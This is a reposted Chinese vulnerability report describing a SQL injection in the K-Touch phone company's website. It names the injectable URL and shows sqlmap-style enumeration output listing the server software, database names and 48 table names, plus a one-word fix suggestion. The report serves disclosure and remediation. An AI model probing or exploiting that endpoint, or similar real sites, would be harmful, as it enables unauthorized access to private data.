网站地图    收藏   

主页 > 后端 > 网站安全 >

天宇手机官网伪静态SQL注入漏洞 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 天宇手机官网伪静态SQL注入漏洞测试URL http: www k-touch cn product condetail prod_id 123 htmlweb server operating system: Windows 2003web application technology: ASP NET, Microsoft IIS...

天宇手机官网伪静态SQL注入漏洞

测试URL http://www.k-touch.cn/product/condetail/prod_id/123.html

 

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
available databases [5]:
[*] donglonghai
[*] information_schema
[*] mysql
[*] qiangguo
[*] renshe

current database:    'renshe'


Database: renshe
[48 tables]
+-------------------+
| yan_access        |
| yan_ad            |
| yan_admin         |
| yan_announce      |
| yan_answer        |
| yan_baoming       |
| yan_bjcx          |
| yan_bs            |
| yan_bscategory    |
| yan_bszn          |
| yan_bszncategory  |
| yan_case          |
| yan_casecategory  |
| yan_category      |
| yan_city          |
| yan_cx            |
| yan_cxcategory    |
| yan_downcategory  |
| yan_download      |
| yan_gk            |
| yan_gkcategory    |
| yan_goodscategory |
| yan_guanggao      |
| yan_hdjl          |
| yan_jgxx          |
| yan_jianli        |
| yan_link          |
| yan_member        |
| yan_msg           |
| yan_news          |
| yan_node          |
| yan_one           |
| yan_onecategory   |
| yan_page          |
| yan_province      |
| yan_role          |
| yan_role_user     |
| yan_sound         |
| yan_special       |
| yan_ticket        |
| yan_toupiao       |
| yan_type          |
| yan_user          |
| yan_xwzx          |
| yan_xwzxcategory  |
| yan_zcfg          |
| yan_zxtype        |
| yan_zxzx          |
+-------------------+



很多敏感表,昨天测试了,未脱裤。

修复方案:

过滤吧。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论